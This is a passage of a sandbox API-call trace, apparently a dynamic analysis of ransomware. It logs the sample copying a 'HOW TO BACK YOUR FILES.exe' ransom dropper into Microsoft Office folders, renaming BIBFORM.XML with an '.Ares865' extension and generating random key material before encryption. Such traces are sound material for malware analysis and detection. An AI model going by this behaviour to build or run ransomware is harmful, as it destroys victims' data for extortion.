Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime") returned 77 [0073.342] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime" [0073.342] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.343] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lime\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.346] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.346] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd5284f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d37d320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d37d320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.347] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.347] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.347] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck" [0073.347] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2ea0 | out: hHeap=0x2b0000) returned 1 [0073.347] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0073.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck") returned 82 [0073.347] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck" [0073.347] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.347] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\graycheck\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.359] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.359] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd5284f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3a3480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3a3480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.359] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.359] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.360] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert" [0073.360] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d77a8 | out: hHeap=0x2b0000) returned 1 [0073.360] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0073.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert") returned 79 [0073.360] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert" [0073.360] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.360] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\desert\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.364] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.364] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd5284f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3c95e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3c95e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.364] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.364] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.364] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow" [0073.364] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0073.364] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0073.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow") returned 85 [0073.364] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow" [0073.364] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.364] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightyellow\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.369] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.369] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd502390, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3c95e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3c95e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.370] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.370] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.370] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange" [0073.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0073.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0073.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange") returned 85 [0073.370] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange" [0073.370] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.370] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.375] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.375] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd4dc230, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3c95e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3c95e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.375] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.375] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.375] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay" [0073.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0073.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0073.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay") returned 79 [0073.376] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay" [0073.376] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.376] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\biscay\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.380] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.380] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd4b60d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3ef740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3ef740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.380] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.380] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.380] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue" [0073.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2df0 | out: hHeap=0x2b0000) returned 1 [0073.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0073.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue") returned 81 [0073.380] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue" [0073.380] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.380] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.384] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.384] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd48ff70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3ef740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3ef740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.384] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.384] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.385] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana" [0073.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2d40 | out: hHeap=0x2b0000) returned 1 [0073.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0073.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana") returned 82 [0073.385] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana" [0073.385] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.385] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\americana\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.389] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.389] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd4b60d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3ef740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3ef740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.389] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.389] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.389] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices" [0073.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0073.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0073.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices") returned 60 [0073.389] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices" [0073.389] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.389] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.394] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.394] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecec290, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d3ef740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d3ef740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.394] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.394] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.394] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography" [0073.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0073.394] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0073.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography") returned 60 [0073.395] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography") returned="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography" [0073.395] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.395] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.399] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.399] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e1bb530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d4158a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d4158a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.399] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.399] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.399] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML.Ares865") returned 80 [0073.399] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\bibform.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\bibform.xml.ares865"), dwFlags=0x1) returned 1 [0073.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\bibform.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.400] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=91618) returned 1 [0073.401] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.401] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.401] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.410] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.411] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.411] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.413] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\MEDIA", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA") returned="C:\\Program Files\\Microsoft Office\\MEDIA" [0073.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0073.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: 